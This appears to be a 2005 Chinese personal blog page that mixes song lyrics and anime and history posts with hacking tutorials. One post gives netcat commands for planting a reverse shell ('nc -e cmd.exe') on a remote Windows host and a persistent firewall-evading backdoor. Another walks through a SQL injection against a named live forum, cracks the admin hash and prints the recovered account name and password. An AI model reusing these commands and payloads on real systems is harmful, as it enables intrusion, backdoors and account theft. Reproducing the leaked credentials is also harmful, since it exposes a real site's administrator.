关于作者

姓名:

性别:其他

出生日期:--

地区:

联系电话:

QQ:--

婚否:保密
用户名:hqxweb
笔名:hqxweb
地区:
行业:其他

日历  

快速登录

+ 用户名:
+ 密 码:

在线留言



http://hongser.blog.sohu.com/

访问统计:
文章个数:7
评论个数:3
留言条数:2




Powered by BlogDriver 2.1

hqxweb的博客

 

欢迎访问hqxweb的博客

文章

史记观感
摘要:太史公的笔触实在是让人佩服.,其中最让人心动的 查看全文

- 作者: hqxweb 2006年10月30日, 星期一 13:08  回复(0) |  引用(0) 加入博采

nc的用法

、-v
详细输出——用两个-v可得到更详细的内容,和其他参数连用。

二、-w secs
超时,以秒计。只在双机发生连接后开始计时。


三、-p port
打开本地端口号。例:nc -p 8888


四、-l
监听模式,用于入站连接。和-v参数与>>符合连用可以记录本机接收到
的数据包。例:(nc -vv -w 5 -l -p 80>>80.txt),这样就把80端口收
到的数据写入txt文件中,连接5秒后会自动断开。可以做个批处理文件看:
@echo off
color f0
:start
cls
C:\\nc -vv -w 3 -l -p 80>>80.txt
goto start
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多
是三条一组--妮姆达病毒扫描你的。


五、-e prog
程序重定向,一旦连接,就执行。例:(nc -e 程序名称 IP 端口)
应用举例:
先把nc.exe传到对方电脑的winnt下(即Admin$下),令cmd.exe在上
午十点二十五分连接到自己的7878端口:
at \\\\对方IP 10:25Am nc -e cmd.exe 自己IP 7878
在自己电脑上用-l参数和-p参数开7878端口监听(nc -vv -l -p 7878)
这样只要对方连接过来,我们就进入了他的winnt\\system32文件夹下。
也可以:at \\\\对方IP 10:25Am nc -l -p 23 -t -e cmd.exe 这是绑定
cmd.exe到telnet端口等待连接,直接telnet IP就可以进入对方机器。


六、-h
帮助


七、端口扫描
例(nc -vv IP地址 -w 2 80 21-25 1433),这就是一个简单的端口扫描
器,将按照主机名--IP--端口(名称)--端口状态来显示,如果不加-w
参数,扫到端口后会停下来等待用户输入命令。


八、-o file
记录16进制的传输。和>>file有点象似,第一列是内存地址,第二列是
16进制的字符码,第三列是接收到的报文。例如探测网络焦点的端口:
(nc -vv -w 2 -o test.txt www.xfocus.net 80 21-25),会将报文写入
一个test.txt的文件中去。


九、-L与-e参数配合
在对方电脑上运行(nc -L -p 53 -d -e cmd.exe),可以突破防火墙。
-L参数是即使本次连接断掉,nc.exe仍然在运行。53号端口是Domain Name
Server域名服务端口,应该不会受到防火墙的封索,我们用nc vv IP 53
这样就连进去啦。并且只要nc进程不被杀掉,这个后门一直存在。嘿嘿,
说是这样说,第三方应用程序例如天网就能把nc拦住,我试了139、1025、
445都无效 那个-d参数是为了出错后不显示信息。139要加参数-s(nc
-L -p 139 -d -e cmd.exe -s 对方本机IP)这样就可以保证nc.exe优先
于NETBIOS。

                             ---------------引自黑客天涯!!!

- 作者: hqxweb 2005年10月30日, 星期日 16:13  回复(0) |  引用(0) 加入博采

神话

梦中的人熟悉的脸孔
你是我守候的温柔
就算泪水淹没天地
我不会放手,每一刻孤独的承受
只因我曾许下承诺
你我之间熟悉的感动
爱就要苏醒
万世沧桑唯有爱是永远的神话
潮起潮落始终不悔真爱的相约
几番若痛的纠缠多少黑夜掐扎
紧握双手让我和你再也不离分
枕上雪冰封的爱恋
真心相摇篮才能融解
风中摇曳炉上的火
不灭亦不休
等待花开春去春又来
无情岁月笑我痴狂
心如钢铁任世界荒芜
思念永相随
悲欢负月唯有爱是永远的神话
谁都没有遗忘古老,古老的誓言
你的泪水化为漫天飞舞的彩蝶
爱是翼下之风两心相随自在飞
你就是我心中唯一美丽的神话


- 作者: hqxweb 2005年10月23日, 星期日 15:30  回复(1) |  引用(0) 加入博采

火影忍者

   初次看到的时候很觉得无聊,但是渐渐的就觉得火影忍者有一种激情

不论是鸣人还是卡卡西 都是最棒的!

http://www.xfdm.com/html/1/index.html      这是一个动漫火影的网站,一直到了280话呢!

- 作者: hqxweb 2005年10月23日, 星期日 14:55  回复(0) |  引用(0) 加入博采

MD5 密码直接查询
天在neworder.box.sk论坛看到一个帖子,吸引我的眼球。

发贴的自称是MD5破解研究小组,主要是他建立了MD5 查寻数据库

首先进入他的查询页

http://www.md5lookup.com/?category=01-3&search=on


居作者称在服务器建立了有90G大的数据库  这个才真的叫人佩服!!

不过我测试好像只能查询32位的密文,没关系,前去8后去8,提取中间的就是16位的

只支持9位数字加密的,估计把26个英文字母也加进数据库,估计就是上千G的硬盘空间了,哈哈

不错,比那些明文对照MD5参照表效率要高的多了。

下面开始test
服务器不是中国的所以比较慢的了!
但是速度却是惊人的快!!!!
e10adc3949ba59abbe56e057f20f883e - 123456
f561aaf6ef0bf14d4208bb46a4ccb3ad - xxx

e10adc3949ba59abbe56e057f20f883e 123456
f561aaf6ef0bf14d4208bb46a4ccb3ad xxx

教程结束!

- 作者: hqxweb 2005年10月23日, 星期日 09:55  回复(2) |  引用(0) 加入博采

bBsxp5.15 漏洞
首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 
漏洞主要出在BLOG.ASP 可以让直接构造数据库命令  
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
后台区长的md5密码就显示出来了。 
前台密码也可以出来, 
网上已经有相关动画,软件。 
就利用这个漏洞,肯定有一批bbsxp的网站要倒下了 
接下来就是讲工具了,准备好MD5密码破解器 
关于md5的破解,比较好使的有md5cracker速度增强版。 
1。先用8位或9位数字跑。很快。 
2。如果不行,用小写字母跑。选择5-6位比较好。 
3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的, 
   跑上及几个小时。(你的机器配置必须很好) 
4。再不行,建议放弃,太变态了。 
前台ok...后台密码..(注:你必须知道管理员的帐号) 
直接默认的配置就是直接拿下后台密码... 
直接吧前台md5密码暴出来。 
剩下的事就事破解md5了。 
现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作 
按照上面工具的介绍先用数字把, 
正在破===耐心等等 
我接条信息,大家不介意把~ 
出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。 
bBsxp5.15最新漏洞的原始作者不清

- 作者: hqxweb 2005年10月23日, 星期日 09:38  回复(0) |  引用(0) 加入博采

雅虎的邮件漏洞
据国外媒体21日报道,一家安全公司日前发布警报说,雅虎的免费邮箱服务存在一个能够导致账号劫持、“钓鱼式攻击”的漏洞。周五,雅虎公司发言人表示已经解决了这个漏洞。 







  据发布这个安全警报的安全公司“SEC咨询公司”说,这个问题名为“交叉站点脚本攻击漏洞”。问题出现的原因是,雅虎的邮件系统中没有对用户提交的特殊字符进行检测。 
  据悉,“交叉站点脚本攻击漏洞”是一种比较常见的网站应用服务漏洞,几天前,Google的网站也曾爆出这个漏洞。去年,微软公司的Xbox 360站点也出现了类似问题。据悉,黑客可以利用这个安全漏洞劫持邮箱用户的账号和密码,发动窃取用户身份的“钓鱼式攻击”,甚至可以将恶意代码下载到用户的电脑中。 
  雅虎公司发言人表示,该公司已经解决了这个网站漏洞。他说:“雅虎最近获悉邮箱服务出现安全问题,我们的技术人员已经通过服务器端的修补程序进行了解决,邮箱用户无需采取任何措施。” 他还说截至目前没有接到用户“遭袭”的报告。  

- 作者: hqxweb 2005年10月23日, 星期日 09:37  回复(0) |  引用(0) 加入博采